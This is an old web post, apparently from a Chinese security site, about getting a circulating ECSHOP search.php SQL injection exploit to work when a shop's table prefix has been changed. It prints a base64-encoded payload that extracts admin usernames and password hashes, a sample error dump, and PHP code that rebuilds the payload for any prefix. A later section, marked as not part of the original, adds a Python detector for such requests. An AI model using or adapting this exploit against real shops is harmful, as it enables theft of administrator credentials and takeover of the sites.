How to fix the error returned by the ECSHOP search injection exploit!

Category: Security | 2011-09-23 | Viewed 105 times

Using the ECSHOP EXP that circulates online:

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

 

 

Returned:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM `ccwww`.`ccc_goods_attr` WHERE 0 OR (1 AND attr_id = '1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#' AND attr_value LIKE '%1%' ) GROUP BY goods_id HAVING num = '1' ) [2] => Array ( [error] => Table 'ccwww.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )
The cause is that the database table prefix has been changed.

Solution: regenerate a variant of the EXP.

Use the code below to generate the encoded value:

 

<?php
// Table prefix: defaults to ecs_, can be overridden with the "pre" request parameter
$p="ecs_";
$p=isset($_REQUEST['pre'])?$_REQUEST['pre']:$p;
$arr=array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'\"\\') union select 1#\"'),1 from ".$p."admin_user#"=>"1");
$exp = array("attr"=>$arr);
$exp = base64_encode(serialize($exp));
//echo $exp;
?>
<textarea name="textarea" id="textarea" cols="100" rows="5"><?=$exp?></textarea>

 

 

 

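Save the code above as webshell.php,

change the ecs_ table prefix (marked in red) to the ccc_ table prefix (marked in blue) used as the example in this article,

then access it at https://www.webshell.cc/webshell.php to generate the new Base64-encoded value.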
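
For the defending side, an added example (not part of the original post): it decodes the `encode` parameter of a logged request and flags `attr` entries whose key is not an integer, since the error output above shows that key landing inside `attr_id = '...'`. The names `parse_php`, `check_request` and `SQL_META`, and the assumption that legitimate attribute IDs are integers, belong to this example only.

```python
import base64, re
from urllib.parse import urlsplit, parse_qs

SQL_META = re.compile(r"['\"\\#]|--|\b(?:union|select)\b", re.I)

def parse_php(b, i=0):
    """Minimal reader for PHP serialize() output (a:, s:, i: only).
    Returns (value, next_index); raises ValueError on anything else."""
    tag = b[i:i + 1]
    if tag == b"i":
        end = b.index(b";", i)
        return int(b[i + 2:end]), end + 1
    if tag in (b"s", b"a"):
        colon = b.index(b":", i + 2)
        n = int(b[i + 2:colon])
        if tag == b"s":
            start = colon + 2                    # skip :"
            return b[start:start + n].decode("latin-1"), start + n + 2
        pos, out = colon + 2, {}                 # skip :{
        for _ in range(n):
            key, pos = parse_php(b, pos)
            out[key], pos = parse_php(b, pos)
        return out, pos + 1                      # skip }
    raise ValueError("unsupported serialize() type")

def check_request(url):
    """Return findings for one request URL; an empty list means nothing flagged."""
    findings = []
    for raw in parse_qs(urlsplit(url).query).get("encode", []):
        try:
            data, _ = parse_php(base64.b64decode(raw.replace(" ", "+")))
        except (ValueError, TypeError, RecursionError):
            findings.append("encode is not base64 of a serialized array")
            continue
        attrs = data.get("attr") if isinstance(data, dict) else None
        for key, value in (attrs.items() if isinstance(attrs, dict) else []):
            # Assumption: legitimate attribute IDs are integers.
            if not isinstance(key, int) or SQL_META.search(str(value)):
                findings.append(f"suspicious attr entry: {key!r} => {value!r}")
    return findings

# Sample requests: the first is the one quoted on this page, the second is constructed.
PAGE_URL = "/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319"
BENIGN_URL = "/search.php?encode=" + base64.b64encode(
    b'a:1:{s:4:"attr";a:1:{i:185;s:3:"red";}}').decode()

if __name__ == "__main__":
    for u in (PAGE_URL, BENIGN_URL):
        print(u[:40], check_request(u))
```

The same check can run over the query strings in a web server access log; anything that fails to decode is reported as well, because a normal search form would not produce it.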

How to fix the error returned by the ECSHOP search injection exploit!: https://www.webshell.cc/1459.html